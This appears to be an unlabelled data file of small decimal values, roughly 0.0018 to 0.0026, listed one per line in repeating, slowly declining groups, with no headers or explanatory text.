0.00168977
0.00168977
0.00169344
0.00169344
0.0016896
0.00171616
0.00172
0.00172
0.0017166
0.00171633
0.00172014
0.00171633
0.00169357
0.00169321
0.00168977
0.00168977
0.00169343
0.00169343
0.00168959
0.00171616
0.00172001
0.00172001
0.00171661
0.00171634
0.00172015
0.00171634
0.00169358
0.00169322
0.00168978
0.00168978
0.00169344
0.00169344
0.0016896
0.00169357
0.00169321
0.00168977
0.00168977
0.0016896
0.00169343
0.00169343
0.00168077
0.0016846
0.0016846
0.00168121
0.00168474
0.00168094
0.00168094
0.00168076
0.00168459
0.0016846
0.00168121
0.00168094
0.00168473
0.00168094
0.00168077
0.0016846
0.0016846
0.00168121
0.00168094
0.00168474
0.00168094
0.00258281
0.00258281
0.00257293
0.00257293
0.00257293
0.00257293
0.00258281
0.00258281
0.00258281
0.00257293
0.00257293
0.00257293
0.00257293
0.00258281
0.00258281
0.00258281
0.00257293
0.00257293
0.00257293
0.00257293
0.00258281
0.00256306
0.00255321
0.00255321
0.00256306
0.00256306
0.00256306
0.0025532
0.00256306
0.00255321
0.0025532
0.00256306
0.00256306
0.00256306
0.0025532
0.00256306
0.0025532
0.0025532
0.00256306
0.00256306
0.00256306
0.0025532
0.00256306
0.0025532
0.0025532
0.00256306
0.00256306
0.00256306
0.0025532
0.002575
0.0025707
0.00257089
0.00257514
0.00257511
0.00257501
0.00257089
0.00258074
0.00258491
0.00258043
0.00258498
0.00258055
0.00258052
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257502
0.00257509
0.00257086
0.00258076
0.00258063
0.002585
0.0025849
0.00258059
0.00258077
0.00258489
0.002575
0.00257089
0.0025707
0.00257514
0.00257501
0.00257511
0.00257089
0.00258074
0.00258491
0.00258042
0.00258498
0.00258056
0.00258052
0.0025849
0.00257502
0.00257064
0.00257508
0.00257067
0.00257502
0.00257509
0.00257086
0.00258076
0.00258063
0.0025849
0.002585
0.00258077
0.00258059
0.00258489
0.002575
0.00257478
0.00257086
0.00257086
0.00257491
0.00257491
0.00257075
0.00254336
0.00254336
0.00253354
0.00253354
0.00253354
0.00253353
0.00254336
0.00254336
0.00254336
0.00253354
0.00253354
0.00253354
0.00253353
0.00254336
0.00254336
0.00254336
0.00253354
0.00253354
0.00253354
0.00253353
0.00254336
0.00252373
0.00251393
0.00251393
0.00252372
0.00252372
0.00252372
0.00251392
0.00252373
0.00251393
0.00251393
0.00252372
0.00252372
0.00252372
0.00251392
0.00252373
0.00251393
0.00251393
0.00252372
0.00252372
0.00252372
0.00251392
0.00252373
0.00251393
0.00251393
0.00252372
0.00252372
0.00252372
0.00251392
0.0025356
0.00253572
0.00253131
0.00253152
0.0025357
0.00253561
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254544
0.00254112
0.00254107
0.00254133
0.00254118
0.00254553
0.00254544
0.00254543
0.00254113
0.00254134
0.00253561
0.00253124
0.00253567
0.00253129
0.00253561
0.00253568
0.00253149
0.0025356
0.00253572
0.00253152
0.0025313
0.00253561
0.0025357
0.00253151
0.00254131
0.00254544
0.00254551
0.00254098
0.00254544
0.00254112
0.00254107
0.00254133
0.00254118
0.00254544
0.00254553
0.00254543
0.00254134
0.00254113
0.00253561
0.00253124
0.00253567
0.00253129
0.00253561
0.00253568
0.00253149
0.00253559
0.00253538
0.00253148
0.00253148
0.0025355
0.0025355
0.00253135
0.00250414
0.00250414
0.00249437
0.00249437
0.00249437
0.00249436
0.00250414
0.00250414
0.00250414
0.00249437
0.00249437
0.00249437
0.00249436
0.00250414
0.00250414
0.00250414
0.00249437
0.00249437
0.00249437
0.00249436
0.00250414
0.00248461
0.00247487
0.00247486
0.00248461
0.00248461
0.00248461
0.00247486
0.00248461
0.00247487
0.00247486
0.00248461
0.00248461
0.00248461
0.00247486
0.00248461
0.00247486
0.00247486
0.00248461
0.00248461
0.00248461
0.00247486
0.00248461
0.00247486
0.00247486
0.00248461
0.00248461
0.00248461
0.00247486
0.00249641
0.00249652
0.00249213
0.00249237
0.0024965
0.00249643
0.00249235
0.0025021
0.0025062
0.00250627
0.00250176
0.0025062
0.0025019
0.00250185
0.00250212
0.00250194
0.00250628
0.0025062
0.00250619
0.0025019
0.00250214
0.00249642
0.00249207
0.00249648
0.00249213
0.00249642
0.00249649
0.00249233
0.00249641
0.00249652
0.00249237
0.00249213
0.00249643
0.0024965
0.00249235
0.0025021
0.0025062
0.00250627
0.00250176
0.0025062
0.0025019
0.00250185
0.00250212
0.00250194
0.0025062
0.00250628
0.00250619
0.00250214
0.0025019
0.00249642
0.00249207
0.00249649
0.00249213
0.00249642
0.00249649
0.00249232
0.0024964
0.00249619
0.00249232
0.00249232
0.00249632
0.00249632
0.00249217
0.00246513
0.00246513
0.00245542
0.00245541
0.00245541
0.00245541
0.00246513
0.00246513
0.00246513
0.00245542
0.00245541
0.00245541
0.00245541
0.00246513
0.00246513
0.00246513
0.00245542
0.00245541
0.00245541
0.00245541
0.00246513
0.00244571
0.00243601
0.00243601
0.00244571
0.00244571
0.0024457
0.00243601
0.00244571
0.00243601
0.00243601
0.00244571
0.00244571
0.0024457
0.00243601
0.00244571
0.00243601
0.00243601
0.00244571
0.00244571
0.0024457
0.00243601
0.00244571
0.00243601
0.00243601
0.00244571
0.00244571
0.0024457
0.00243601
0.00245744
0.00245754
0.00245316
0.00245342
0.00245753
0.00245745
0.00245341
0.00246309
0.00246718
0.00246724
0.00246274
0.00246717
0.0024629
0.00246283
0.00246312
0.00246292
0.00246725
0.00246718
0.00246716
0.00246289
0.00246314
0.00245745
0.00245311
0.00245751
0.00245318
0.00245745
0.00245752
0.00245337
0.00245744
0.00245754
0.00245342
0.00245316
0.00245745
0.00245753
0.00245341
0.00246309
0.00246717
0.00246724
0.00246274
0.00246717
0.0024629
0.00246283
0.00246312
0.00246292
0.00246718
0.00246725
0.00246716
0.00246314
0.00246289
0.00245745
0.00245311
0.00245751
0.00245318
0.00245745
0.00245752
0.00245337
0.00245743
0.00245722
0.00245337
0.00245337
0.00245734
0.00245734
0.00245321
0.00242633
0.00242633
0.00241667
0.00241666
0.00241666
0.00241665
0.00242632
0.00242633
0.00242633
0.00241667
0.00241666
0.00241666
0.00241665
0.00242632
0.00242633
0.00242633
0.00241667
0.00241666
0.00241666
0.00241665
0.00242632
0.00240701
0.00239736
0.00239736
0.002407
0.002407
0.002407
0.00239735
0.00240701
0.00239736
0.00239736
0.002407
0.002407
0.002407
0.00239735
0.00240701
0.00239736
0.00239736
0.002407
0.002407
0.002407
0.00239735
0.00240701
0.00239736
0.00239736
0.002407
0.002407
0.002407
0.00239735
0.00241867
0.00241877
0.00241441
0.00241468
0.00241875
0.00241868
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242835
0.0024241
0.00242402
0.00242433
0.00242411
0.00242843
0.00242836
0.00242834
0.00242408
0.00242435
0.00241868
0.00241435
0.00241874
0.00241443
0.00241868
0.00241875
0.00241463
0.00241867
0.00241877
0.00241468
0.00241441
0.00241868
0.00241875
0.00241466
0.00242429
0.00242835
0.00242842
0.00242394
0.00242835
0.0024241
0.00242402
0.00242433
0.00242411
0.00242836
0.00242843
0.00242834
0.00242435
0.00242408
0.00241868
0.00241435
0.00241874
0.00241443
0.00241868
0.00241874
0.00241463
0.00241866
0.00241845
0.00241462
0.00241462
0.00241857
0.00241857
0.00241445
0.00238773
0.00238773
0.00237811
0.00237811
0.00237811
0.0023781
0.00238772
0.00238773
0.00238773
0.00237811
0.00237811
0.00237811
0.0023781
0.00238772
0.00238773
0.00238773
0.00237811
0.00237811
0.00237811
0.0023781
0.00238772
0.0023685
0.0023589
0.0023589
0.0023685
0.0023685
0.00236849
0.00235889
0.0023685
0.0023589
0.0023589
0.0023685
0.0023685
0.00236849
0.00235889
0.0023685
0.0023589
0.0023589
0.0023685
0.0023685
0.00236849
0.00235889
0.0023685
0.0023589
0.0023589
0.0023685
0.0023685
0.00236849
0.00235889
0.00238009
0.00238019
0.00237584
0.00237613
0.00238018
0.00238011
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238973
0.0023855
0.00238542
0.00238573
0.0023855
0.0023898
0.00238974
0.00238972
0.00238547
0.00238575
0.0023801
0.00237579
0.00238017
0.00237588
0.0023801
0.00238017
0.00237607
0.00238009
0.00238019
0.00237613
0.00237584
0.00238011
0.00238018
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238973
0.0023855
0.00238542
0.00238573
0.0023855
0.00238974
0.0023898
0.00238972
0.00238575
0.00238547
0.0023801
0.00237579
0.00238017
0.00237588
0.0023801
0.00238017
0.00237607
0.00238009
0.00237988
0.00237607
0.00237607
0.00238
0.00238
0.00237589
0.00234931
0.00234931
0.00233974
0.00233974
0.00233974
0.00233973
0.0023493
0.00234931
0.00234931
0.00233974
0.00233974
0.00233974
0.00233973
0.0023493
0.00234931
0.00234931
0.00233974
0.00233974
0.00233974
0.00233973
0.0023493
0.00233018
0.00232062
0.00232062
0.00233017
0.00233017
0.00233016
0.00232061
0.00233018
0.00232062
0.00232062
0.00233017
0.00233017
0.00233016
0.00232061
0.00233018
0.00232062
0.00232062
0.00233017
0.00233017
0.00233016
0.00232061
0.00233018
0.00232062
0.00232062
0.00233017
0.00233017
0.00233016
0.00232061
0.0023417
0.00234181
0.00233747
0.00233776
0.00234179
0.00234172
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00235129
0.00234709
0.002347
0.00234731
0.00234708
0.00235137
0.0023513
0.00235128
0.00234705
0.00234734
0.00234171
0.00233742
0.00234179
0.00233751
0.00234172
0.00234179
0.0023377
0.0023417
0.00234181
0.00233776
0.00233747
0.00234172
0.0023418
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00235129
0.00234709
0.002347
0.00234731
0.00234708
0.0023513
0.00235137
0.00235128
0.00234734
0.00234705
0.00234171
0.00233742
0.00234179
0.00233751
0.00234172
0.00234179
0.0023377
0.00234171
0.00234149
0.0023377
0.0023377
0.00234161
0.00234161
0.00233752
0.00231108
0.00231108
0.00230156
0.00230155
0.00230155
0.00230154
0.00231107
0.00231108
0.00231108
0.00230156
0.00230155
0.00230155
0.00230154
0.00231107
0.00231108
0.00231108
0.00230156
0.00230155
0.00230155
0.00230154
0.00231107
0.00229204
0.00228252
0.00228252
0.00229203
0.00229203
0.00229202
0.00228251
0.00229204
0.00228252
0.00228252
0.00229203
0.00229203
0.00229202
0.00228251
0.00229204
0.00228252
0.00228252
0.00229203
0.00229203
0.00229202
0.00228251
0.00229204
0.00228252
0.00228252
0.00229203
0.00229203
0.00229202
0.00228251
0.00230349
0.0023036
0.00229928
0.00229957
0.00230359
0.00230351
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00231304
0.00230885
0.00230877
0.00230908
0.00230884
0.00231312
0.00231305
0.00231303
0.00230881
0.00230911
0.0023035
0.00229924
0.00230359
0.00229932
0.00230351
0.00230359
0.00229951
0.00230349
0.0023036
0.00229957
0.00229928
0.00230351
0.00230359
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00231304
0.00230886
0.00230877
0.00230908
0.00230884
0.00231305
0.00231312
0.00231303
0.00230911
0.00230881
0.00230351
0.00229924
0.00230359
0.00229932
0.00230351
0.00230359
0.00229951
0.00230351
0.00230329
0.00229951
0.00229951
0.00230341
0.00230341
0.00229932
0.00227302
0.00227302
0.00226354
0.00226353
0.00226353
0.00226352
0.00227301
0.00227302
0.00227302
0.00226354
0.00226353
0.00226353
0.00226352
0.00227301
0.00227302
0.00227302
0.00226353
0.00226353
0.00226353
0.00226352
0.00227301
0.00225405
0.00224458
0.00224458
0.00225405
0.00225405
0.00225404
0.00224457
0.00225405
0.00224458
0.00224458
0.00225405
0.00225405
0.00225404
0.00224457
0.00225405
0.00224458
0.00224458
0.00225405
0.00225405
0.00225404
0.00224457
0.00225405
0.00224458
0.00224458
0.00225405
0.00225405
0.00225404
0.00224457
0.00226545
0.00226557
0.00226126
0.00226155
0.00226556
0.00226547
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227496
0.00227079
0.00227071
0.00227102
0.00227078
0.00227505
0.00227497
0.00227495
0.00227075
0.00227104
0.00226547
0.00226122
0.00226556
0.0022613
0.00226547
0.00226556
0.00226149
0.00226545
0.00226557
0.00226155
0.00226126
0.00226547
0.00226556
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227496
0.00227079
0.00227071
0.00227102
0.00227078
0.00227497
0.00227505
0.00227495
0.00227104
0.00227075
0.00226547
0.00226121
0.00226556
0.0022613
0.00226547
0.00226556
0.00226149
0.00226548
0.00226525
0.00226149
0.00226149
0.00226538
0.00226538
0.0022613
0.00223512
0.00223512
0.00222567
0.00222566
0.00222566
0.00222565
0.0022351
0.00223512
0.00223512
0.00222567
0.00222566
0.00222566
0.00222565
0.0022351
0.00223512
0.00223512
0.00222567
0.00222566
0.00222566
0.00222565
0.0022351
0.00221622
0.00220678
0.00220678
0.00221622
0.00221622
0.0022162
0.00220677
0.00221622
0.00220678
0.00220678
0.00221622
0.00221622
0.0022162
0.00220677
0.00221622
0.00220678
0.00220678
0.00221622
0.00221622
0.0022162
0.00220677
0.00221622
0.00220678
0.00220678
0.00221622
0.00221622
0.0022162
0.00220677
0.00222756
0.00222769
0.00222339
0.00222368
0.00222768
0.00222759
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223704
0.00223289
0.0022328
0.00223311
0.00223287
0.00223714
0.00223705
0.00223702
0.00223284
0.00223314
0.00222758
0.00222335
0.00222769
0.00222344
0.00222759
0.00222769
0.00222363
0.00222757
0.00222769
0.00222368
0.00222339
0.00222759
0.00222768
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223704
0.00223289
0.0022328
0.00223311
0.00223287
0.00223705
0.00223714
0.00223702
0.00223314
0.00223284
0.00222758
0.00222335
0.00222769
0.00222344
0.00222759
0.00222768
0.00222362
0.00222761
0.00222736
0.00222362
0.00222362
0.0022275
0.0022275
0.00222343
0.00219735
0.00219735
0.00218794
0.00218793
0.00218793
0.00218792
0.00219734
0.00219735
0.00219735
0.00218794
0.00218793
0.00218793
0.00218792
0.00219734
0.00219735
0.00219735
0.00218794
0.00218793
0.00218793
0.00218792
0.00219734
0.00217852
0.00216911
0.00216911
0.00217852
0.00217852
0.0021785
0.00216909
0.00217852
0.00216911
0.00216911
0.00217852
0.00217852
0.0021785
0.00216909
0.00217852
0.00216911
0.00216911
0.00217852
0.00217852
0.0021785
0.00216909
0.00217852
0.00216911
0.00216911
0.00217852
0.00217852
0.0021785
0.00216909
0.00218982
0.00218995
0.00218566
0.00218595
0.00218994
0.00218984
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219926
0.00219513
0.00219504
0.00219535
0.00219511
0.00219937
0.00219927
0.00219924
0.00219508
0.00219537
0.00218984
0.00218562
0.00218995
0.00218571
0.00218985
0.00218995
0.00218589
0.00218982
0.00218995
0.00218595
0.00218566
0.00218984
0.00218994
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219926
0.00219513
0.00219504
0.00219535
0.00219511
0.00219927
0.00219937
0.00219924
0.00219537
0.00219508
0.00218984
0.00218562
0.00218995
0.00218571
0.00218985
0.00218995
0.00218589
0.00218987
0.00218962
0.00218589
0.00218589
0.00218976
0.00218976
0.0021857
0.00215971
0.00215971
0.00215032
0.00215032
0.00215032
0.0021503
0.00215969
0.00215971
0.00215971
0.00215032
0.00215031
0.00215031
0.0021503
0.00215969
0.00215971
0.00215971
0.00215032
0.00215031
0.00215031
0.0021503
0.00215969
0.00214093
0.00213154
0.00213154
0.00214093
0.00214093
0.00214091
0.00213153
0.00214093
0.00213154
0.00213154
0.00214093
0.00214093
0.00214091
0.00213153
0.00214093
0.00213154
0.00213154
0.00214093
0.00214093
0.00214091
0.00213153
0.00214093
0.00213154
0.00213154
0.00214093
0.00214093
0.00214091
0.00213153
0.00215219
0.00215233
0.00214805
0.00214833
0.00215232
0.00215221
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.00216161
0.00215749
0.0021574
0.00215771
0.00215746
0.00216172
0.00216161
0.00216158
0.00215744
0.00215773
0.00215221
0.00214801
0.00215233
0.00214809
0.00215222
0.00215233
0.00214828
0.00215219
0.00215233
0.00214833
0.00214804
0.00215221
0.00215232
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.00216161
0.00215749
0.0021574
0.00215771
0.00215746
0.00216161
0.00216172
0.00216159
0.00215773
0.00215744
0.00215221
0.00214801
0.00215233
0.00214809
0.00215222
0.00215233
0.00214828
0.00215225
0.00215199
0.00214828
0.00214828
0.00215214
0.00215214
0.00214809
0.00212217
0.00212217
0.0021128
0.0021128
0.00211279
0.00211278
0.00212215
0.00212217
0.00212217
0.0021128
0.0021128
0.0021128
0.00211278
0.00212215
0.00212217
0.00212217
0.0021128
0.00211279
0.0021128
0.00211278
0.00212215
0.00210344
0.00209407
0.00209407
0.00210343
0.00210343
0.00210341
0.00209405
0.00210344
0.00209407
0.00209407
0.00210343
0.00210343
0.00210341
0.00209405
0.00210344
0.00209407
0.00209407
0.00210343
0.00210343
0.00210341
0.00209405
0.00210344
0.00209407
0.00209407
0.00210343
0.00210343
0.00210341
0.00209405
0.00211466
0.00211481
0.00211053
0.00211081
0.0021148
0.00211468
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00212405
0.00211995
0.00211986
0.00212016
0.00211992
0.00212417
0.00212405
0.00212403
0.0021199
0.00212018
0.00211468
0.00211049
0.00211481
0.00211057
0.0021147
0.00211481
0.00211076
0.00211466
0.00211481
0.00211081
0.00211053
0.00211468
0.0021148
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00212405
0.00211995
0.00211986
0.00212016
0.00211992
0.00212405
0.00212417
0.00212403
0.00212018
0.0021199
0.00211468
0.00211049
0.00211481
0.00211058
0.0021147
0.00211481
0.00211075
0.00211473
0.00211446
0.00211076
0.00211076
0.00211461
0.00211461
0.00211057
0.00208471
0.00208471
0.00207536
0.00207536
0.00207536
0.00207534
0.00208469
0.00208471
0.00208471
0.00207536
0.00207536
0.00207536
0.00207534
0.00208469
0.00208471
0.00208471
0.00207536
0.00207536
0.00207536
0.00207534
0.00208469
0.00206601
0.00205666
0.00205666
0.00206601
0.00206601
0.00206599
0.00205665
0.00206601
0.00205666
0.00205666
0.00206601
0.00206601
0.00206599
0.00205665
0.00206601
0.00205666
0.00205666
0.00206601
0.00206601
0.00206599
0.00205665
0.00206601
0.00205666
0.00205666
0.00206601
0.00206601
0.00206599
0.00205665
0.0020772
0.00207736
0.00207309
0.00207337
0.00207736
0.00207723
0.00207335
0.00208267
0.0020866
0.00208672
0.00208234
0.00208658
0.00208249
0.00208241
0.0020827
0.00208246
0.00208671
0.00208658
0.00208656
0.00208244
0.00208272
0.00207723
0.00207305
0.00207737
0.00207313
0.00207725
0.00207736
0.00207331
0.0020772
0.00207736
0.00207336
0.00207309
0.00207723
0.00207736
0.00207335
0.00208267
0.0020866
0.00208672
0.00208234
0.00208658
0.00208249
0.00208241
0.0020827
0.00208246
0.00208658
0.00208671
0.00208656
0.00208272
0.00208244
0.00207723
0.00207305
0.00207737
0.00207314
0.00207725
0.00207736
0.00207331
0.00207729
0.002077
0.00207331
0.00207331
0.00207717
0.00207717
0.00207313
0.00204732
0.00204732
0.00203799
0.00203799
0.00203799
0.00203797
0.00204731
0.00204732
0.00204732
0.00203799
0.00203799
0.00203799
0.00203797
0.00204731
0.00204732
0.00204732
0.00203799
0.00203799
0.00203799
0.00203797
0.00204731
0.00202866
0.00201933
0.00201933
0.00202866
0.00202866
0.00202864
0.00201932
0.00202866
0.00201933
0.00201933
0.00202866
0.00202866
0.00202864
0.00201932
0.00202866
0.00201933
0.00201933
0.00202866
0.00202866
0.00202864
0.00201932
0.00202866
0.00201933
0.00201933
0.00202866
0.00202866
0.00202864
0.00201932
0.00203982
0.00203999
0.00203572
0.00203599
0.00203998
0.00203984
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.00204919
0.0020451
0.00204502
0.00204531
0.00204508
0.00204932
0.00204918
0.00204916
0.00204505
0.00204533
0.00203985
0.00203568
0.00204
0.00203577
0.00203987
0.00203999
0.00203594
0.00203982
0.00203999
0.00203599
0.00203572
0.00203985
0.00203999
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.00204919
0.0020451
0.00204502
0.00204531
0.00204508
0.00204918
0.00204932
0.00204916
0.00204533
0.00204505
0.00203985
0.00203568
0.00204
0.00203577
0.00203988
0.00203999
0.00203594
0.00203992
0.00203963
0.00203595
0.00203595
0.00203979
0.00203979
0.00203576
0.00201001
0.00201001
0.0020007
0.0020007
0.0020007
0.00200069
0.00201
0.00201001
0.00201001
0.0020007
0.0020007
0.0020007
0.00200069
0.00201
0.00201001
0.00201001
0.0020007
0.0020007
0.0020007
0.00200069
0.00201
0.00199139
0.00198209
0.00198209
0.00199139
0.00199139
0.00199138
0.00198208
0.00199139
0.00198209
0.00198209
0.00199139
0.00199139
0.00199138
0.00198208
0.00199139
0.00198209
0.00198209
0.00199139
0.00199139
0.00199138
0.00198208
0.00199139
0.00198209
0.00198209
0.00199139
0.00199139
0.00199138
0.00198208
0.00200252
0.0020027
0.00199843
0.0019987
0.00200269
0.00200254
0.00199868
0.00200797
0.00201189
0.00201201
0.00200765
0.00201187
0.00200779
0.00200771
0.002008
0.00200777
0.00201201
0.00201186
0.00201184
0.00200774
0.00200802
0.00200255
0.0019984
0.00200271
0.00199848
0.00200258
0.0020027
0.00199865
0.00200252
0.0020027
0.0019987
0.00199843
0.00200254
0.00200269
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00201187
0.00200779
0.00200771
0.002008
0.00200777
0.00201186
0.00201201
0.00201184
0.00200802
0.00200774
0.00200255
0.0019984
0.00200271
0.00199848
0.00200258
0.0020027
0.00199865
0.00200263
0.00200232
0.00199865
0.00199865
0.0020025
0.0020025
0.00199847
0.00197279
0.00197279
0.00196351
0.00196351
0.00196351
0.0019635
0.00197278
0.00197279
0.00197279
0.00196351
0.00196351
0.00196351
0.0019635
0.00197278
0.00197279
0.00197279
0.00196351
0.00196351
0.00196351
0.0019635
0.00197278
0.00195423
0.00194496
0.00194496
0.00195423
0.00195423
0.00195422
0.00194495
0.00195423
0.00194496
0.00194496
0.00195423
0.00195423
0.00195422
0.00194495
0.00195423
0.00194496
0.00194496
0.00195423
0.00195423
0.00195422
0.00194495
0.00195423
0.00194496
0.00194496
0.00195423
0.00195423
0.00195422
0.00194495
0.00196532
0.0019655
0.00196124
0.00196151
0.0019655
0.00196534
0.00196149
0.00197075
0.00197467
0.00197479
0.00197044
0.00197464
0.00197058
0.0019705
0.00197078
0.00197055
0.00197478
0.00197462
0.00197461
0.00197053
0.00197079
0.00196535
0.00196121
0.00196552
0.00196129
0.00196538
0.00196551
0.00196146
0.00196532
0.0019655
0.00196151
0.00196124
0.00196534
0.00196549
0.00196149
0.00197075
0.00197467
0.0019748
0.00197044
0.00197464
0.00197058
0.0019705
0.00197078
0.00197055
0.00197463
0.00197478
0.00197461
0.0019708
0.00197053
0.00196535
0.00196121
0.00196552
0.0019613
0.00196538
0.00196551
0.00196146
0.00196544
0.00196512
0.00196147
0.00196147
0.0019653
0.0019653
0.00196129
0.0019357
0.0019357
0.00192646
0.00192645
0.00192645
0.00192645
0.00193569
0.0019357
0.0019357
0.00192646
0.00192646
0.00192646
0.00192645
0.00193569
0.0019357
0.0019357
0.00192646
0.00192646
0.00192646
0.00192645
0.00193569
0.00191722
0.001908
0.001908
0.00191722
0.00191722
0.00191721
0.00190799
0.00191722
0.001908
0.001908
0.00191722
0.00191722
0.00191721
0.00190799
0.00191722
0.001908
0.001908
0.00191722
0.00191722
0.00191721
0.00190799
0.00191722
0.001908
0.001908
0.00191722
0.00191722
0.00191721
0.00190799
0.00192825
0.00192844
0.0019242
0.00192446
0.00192843
0.00192827
0.00192444
0.00193366
0.00193757
0.0019377
0.00193335
0.00193753
0.00193349
0.00193341
0.00193369
0.00193346
0.00193768
0.00193752
0.0019375
0.00193344
0.0019337
0.00192828
0.00192417
0.00192846
0.00192425
0.00192832
0.00192844
0.00192441
0.00192825
0.00192844
0.00192446
0.0019242
0.00192827
0.00192843
0.00192444
0.00193366
0.00193757
0.0019377
0.00193336
0.00193753
0.00193349
0.00193342
0.00193369
0.00193347
0.00193752
0.00193769
0.0019375
0.0019337
0.00193345
0.00192828
0.00192417
0.00192846
0.00192425
0.00192832
0.00192845
0.00192441
0.00192838
0.00192806
0.00192442
0.00192442
0.00192824
0.00192824
0.00192424
0.00189879
0.00189879
0.0018896
0.0018896
0.0018896
0.00188959
0.00189878
0.00189879
0.00189879
0.0018896
0.0018896
0.0018896
0.00188959
0.00189878
0.00189879
0.00189879
0.0018896
0.0018896
0.0018896
0.00188959
0.00189878
0.00188042
0.00187126
0.00187126
0.00188042
0.00188042
0.00188042
0.00187126
0.00188042
0.00187126
0.00187127
0.00188042
0.00188042
0.00188042
0.00187126
0.00188042
0.00187126
0.00187126
0.00188042
0.00188042
0.00188042
0.00187126
0.00188042
0.00187127
0.00187127
0.00188043
0.00188042
0.00188042
0.00187126
0.00189138
0.00189157
0.00188735
0.00188761
0.00189156
0.0018914
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.0019006
0.00189659
0.00189651
0.00189679
0.00189656
0.00190076
0.00190059
0.00190057
0.00189654
0.0018968
0.00189141
0.00188732
0.00189159
0.00188741
0.00189145
0.00189157
0.00188756
0.00189138
0.00189157
0.0018876
0.00188735
0.00189139
0.00189156
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.0019006
0.00189659
0.00189651
0.00189678
0.00189656
0.00190059
0.00190076
0.00190057
0.0018968
0.00189654
0.00189141
0.00188732
0.00189159
0.0018874
0.00189145
0.00189157
0.00188756
0.00189151
0.00189118
0.00188757
0.00188757
0.00189137
0.00189137
0.00188739
0.00186212
0.00186212
0.00185299
0.001853
0.001853
0.00185299
0.00186212
0.00186212
0.00186212
0.00185299
0.001853
0.001853
0.00185299
0.00186212
0.00186212
0.00186212
0.001853
0.001853
0.001853
0.001853
0.00186212
0.00184389
0.00183481
0.00183481
0.00184389
0.00184389
0.00184389
0.0018348
0.00184389
0.00183481
0.00183481
0.00184389
0.00184389
0.00184389
0.0018348
0.00184389
0.00183481
0.00183481
0.00184389
0.00184389
0.00184389
0.0018348
0.00184389
0.00183481
0.00183481
0.00184389
0.00184389
0.00184389
0.0018348
0.00185476
0.00185495
0.00185076
0.00185102
0.00185495
0.00185478
0.00185101
0.00186009
0.00186396
0.00186409
0.0018598
0.00186392
0.00185995
0.00185986
0.00186013
0.0018599
0.00186408
0.0018639
0.00186389
0.00185988
0.00186014
0.00185479
0.00185073
0.00185498
0.00185083
0.00185484
0.00185496
0.00185097
0.00185476
0.00185495
0.00185101
0.00185076
0.00185477
0.00185495
0.001851
0.00186009
0.00186396
0.00186408
0.00185979
0.00186391
0.00185994
0.00185985
0.00186013
0.0018599
0.0018639
0.00186407
0.00186388
0.00186014
0.00185988
0.00185479
0.00185073
0.00185497
0.00185082
0.00185483
0.00185496
0.00185097
0.00185489
0.00185456
0.00185099
0.00185099
0.00185476
0.00185476
0.00185081
0.00182574
0.00182574
0.00181669
0.00181669
0.00181669
0.00181669
0.00182574
0.00182574
0.00182574
0.00181668
0.00181669
0.00181669
0.00181669
0.00182574
0.00182574
0.00182574
0.00181669
0.00181669
0.00181669
0.00181669
0.00182574
0.00180765
0.00179865
0.00179865
0.00180766
0.00180766
0.00180766
0.00179865
0.00180766
0.00179865
0.00179865
0.00180766
0.00180766
0.00180766
0.00179865
0.00180765
0.00179865
0.00179865
0.00180766
0.00180766
0.00180766
0.00179865
0.00180766
0.00179865
0.00179865
0.00180766
0.00180766
0.00180766
0.00179865
0.00181844
0.00181863
0.00181448
0.00181473
0.00181863
0.00181845
0.00181472
0.00182373
0.00182757
0.00182769
0.00182344
0.00182752
0.00182359
0.00182349
0.00182376
0.00182354
0.00182768
0.0018275
0.00182749
0.00182352
0.00182377
0.00181847
0.00181445
0.00181866
0.00181455
0.00181852
0.00181865
0.00181468
0.00181843
0.00181863
0.00181472
0.00181448
0.00181845
0.00181863
0.00181471
0.00182372
0.00182757
0.00182769
0.00182344
0.00182751
0.00182359
0.00182349
0.00182376
0.00182354
0.0018275
0.00182768
0.00182748
0.00182377
0.00182352
0.00181846
0.00181445
0.00181866
0.00181454
0.00181852
0.00181864
0.00181468
0.00181858
0.00181824
0.0018147
0.0018147
0.00181844
0.00181844
0.00181452
0.00178965
0.00178965
0.00178067
0.00178068
0.00178068
0.00178067
0.00178965
0.00178965
0.00178965
0.00178067
0.00178068
0.00178067
0.00178067
0.00178965
0.00178965
0.00178965
0.00178067
0.00178068
0.00178067
0.00178067
0.00178965
0.00177171
0.00176277
0.00176277
0.00177172
0.00177172
0.00177171
0.00176277
0.00177171
0.00176277
0.00176277
0.00177172
0.00177172
0.00177171
0.00176277
0.00177171
0.00176277
0.00176277
0.00177172
0.00177172
0.00177171
0.00176277
0.00177171
0.00176277
0.00176277
0.00177172
0.00177172
0.00177171
0.00176277
0.00178242
0.00178262
0.00177849
0.00177873
0.00178262
0.00178243
0.00177873
0.00178767
0.00179148
0.00179161
0.00178739
0.00179142
0.00178753
0.00178744
0.0017877
0.00178748
0.00179159
0.0017914
0.00179139
0.00178746
0.00178771
0.00178245
0.00177847
0.00178265
0.00177857
0.00178251
0.00178263
0.0017787
0.00178241
0.00178262
0.00177873
0.00177849
0.00178243
0.00178261
0.00177872
0.00178766
0.00179148
0.0017916
0.00178739
0.00179142
0.00178753
0.00178743
0.0017877
0.00178748
0.0017914
0.00179159
